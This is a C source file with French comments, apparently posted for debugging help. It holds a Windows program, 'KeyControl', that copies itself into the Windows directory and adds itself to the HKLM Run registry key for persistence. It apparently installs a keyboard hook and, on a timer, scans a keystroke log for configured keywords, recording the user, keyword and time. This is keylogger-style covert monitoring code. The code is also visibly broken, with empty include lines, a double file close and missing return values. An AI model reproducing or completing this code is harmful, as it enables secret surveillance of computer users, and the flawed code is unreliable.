//============================================================================== // KeyControl.c // Ce programme cherche des mots clé dans un fichier de config (keywords.ini). // Des qu'il en trouve un, la fonction FindWords l'envoit à la fonction SearchText(), // qui elle même recherche ce mot dans le log (kc.log). // Si le mot clé est bien dans le log, on appelle la fonction AddEvent. // // Merci ! //============================================================================== #include #include #include int AddEvent(char word[100]) { MessageBox(0, "AddEvent", "", MB_TASKMODAL); char event[200]; char data[50]; SYSTEMTIME CurrentData; GetLocalTime(&CurrentData); sprintf(data, "%d/%d/%d", CurrentData.wDay, CurrentData.wMonth, CurrentData.wYear); char time[50]; SYSTEMTIME CurrentTime; GetLocalTime(&CurrentTime); sprintf(time, "%d:%d", CurrentTime.wHour, CurrentTime.wMinute); char user[50]; DWORD bufCharCount = 50; GetUserName(user, &bufCharCount); sprintf(event, "%s\t\t%s\t\t%s\t%s", user, word, data, time); FILE* eventlog = NULL; eventlog = fopen("kcevent.log", "a"); if(eventlog != NULL) { fseek(eventlog, 0, SEEK_END); fprintf(eventlog, "%s\n", event); fclose(eventlog); } } int SearchText(char text[100]) { MessageBox(0, "SearchText", "", MB_TASKMODAL); char *strFileName = "C:\\WINDOWS\\kc.log"; char *BufferData; DWORD ByteRead; char *pDest; HANDLE hFile; DWORD FileSize; hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, (LPSECURITY_ATTRIBUTES) NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); FileSize = GetFileSize(hFile, (DWORD) NULL); if(FileSize == 0xFFFFFFFF) { CloseHandle(hFile); return 0; } BufferData = (char*) GlobalAlloc(GMEM_FIXED,FileSize); ReadFile(hFile, (LPVOID) BufferData, FileSize, &ByteRead, (LPOVERLAPPED) NULL); if(ByteRead != FileSize && ByteRead != 0) return 0; pDest = strstr(BufferData, text); if(pDest != NULL) { CloseHandle(hFile); DeleteFile(strFileName); AddEvent(text); return 1; } GlobalFree((HGLOBAL) BufferData); CloseHandle(hFile); return 0; } // FONCTION QUI BEUG : int FindWords() { MessageBox(0, "FindWords", "", MB_TASKMODAL); // Voila la bug : la fonction reste bloquée ici, etne poursuit pas la recherche. // Mais ca marche tres bien lancé manuellement. FILE* ini = NULL; char word[100]; long words = 0; int i = 0, j = 0, read = 0; HKEY hKey; ini = fopen("keywords.ini", "r"); if(ini != NULL) { do { read = fgetc(ini); if (read == '\n') words++; } while(read != EOF); rewind(ini); while(j < words) { read = 0; while(i > 0) { read = fgetc(ini); if (read == '\n') i--; } fgets(word, 100, ini); word[strlen(word) - 1] = '\0'; SearchText(word); j++; } fclose(ini); } fclose(ini); } void CALLBACK KeyControlProc(HWND hWnd, UINT uMsg, UINT uTimerId, DWORD dwTime) { FindWords(); } int WINAPI WinMain(HINSTANCE hinstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MSG msg; UINT uTimer; char aPath[126]; char aWindowsDirectory[126]; HMODULE hMe = GetModuleHandle(NULL); DWORD nRet = GetModuleFileName(hMe, aPath, 126); GetWindowsDirectory(aWindowsDirectory, sizeof(aWindowsDirectory)); strcat(aWindowsDirectory, "\\KeyControl.exe" ); if (strcmp(aPath, aWindowsDirectory)) { if(CopyFile(aPath, aWindowsDirectory, 0)) { InitHook(); HKEY hKey; RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey); RegSetValueEx(hKey, "KeyControl", 0, REG_SZ, aWindowsDirectory, sizeof(aWindowsDirectory)); RegCloseKey(hKey); EndHook(); return 0; } } InitHook(); if(!(uTimer = SetTimer(NULL, 1, 900, KeyControlProc))) return 0; while(GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } KillTimer( NULL, uTimer ); EndHook(); return msg.wParam; }